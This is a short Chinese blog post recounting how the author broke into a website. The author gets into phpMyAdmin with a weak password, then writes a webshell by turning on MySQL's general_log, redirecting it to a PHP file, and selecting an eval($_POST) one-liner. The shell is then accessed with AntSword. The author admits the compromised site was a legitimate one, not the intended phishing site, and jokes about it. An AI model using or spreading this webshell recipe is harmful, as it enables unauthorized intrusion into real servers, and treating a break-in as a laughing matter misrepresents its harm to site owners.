记录一次搞笑的拿站经历......

记录个人经验

起因…在论坛上看到一个钓鱼站 直接手起刀落的扫目录

扫出了…如下

 记录一次搞笑的拿站经历......

一顿猛如虎的操作  进去了 别问我怎么进 问就是弱口令

 记录一次搞笑的拿站经历......

phpmyadmin getshell方法

根目录地址自己找方法吧爆破什么的很多网上

 

查看日志状态 

show variables  like  '%general%'; 日志读写是开着的 ON是表示开启OFF表示关闭

要是 general_log OFF 那就用语句SET GLOBAL general_log='on'

开启日志读写

 记录一次搞笑的拿站经历......

创建文件

SET GLOBAL general_log_file='C:/phpStudy/www/xxx.php'

写一句户 SELECT '<?php eval($_POST["cmd"]);?>'

 记录一次搞笑的拿站经历......

然后就连接蚁剑

刚开始连接蚁剑乱码才知道编码没设置要设置为base64

 记录一次搞笑的拿站经历......

记录一次搞笑的拿站经历......

尴尬的事  本来想搞钓鱼站的 后来才发现把人家正规站给拿下了 才想起接口钓鱼站已经挂了 尴尬

 记录一次搞笑的拿站经历......

记录个人经验

上一篇:wsimport生成客户端+客户端调用+客户端修改adress location


下一篇:IDEA中常用优化设置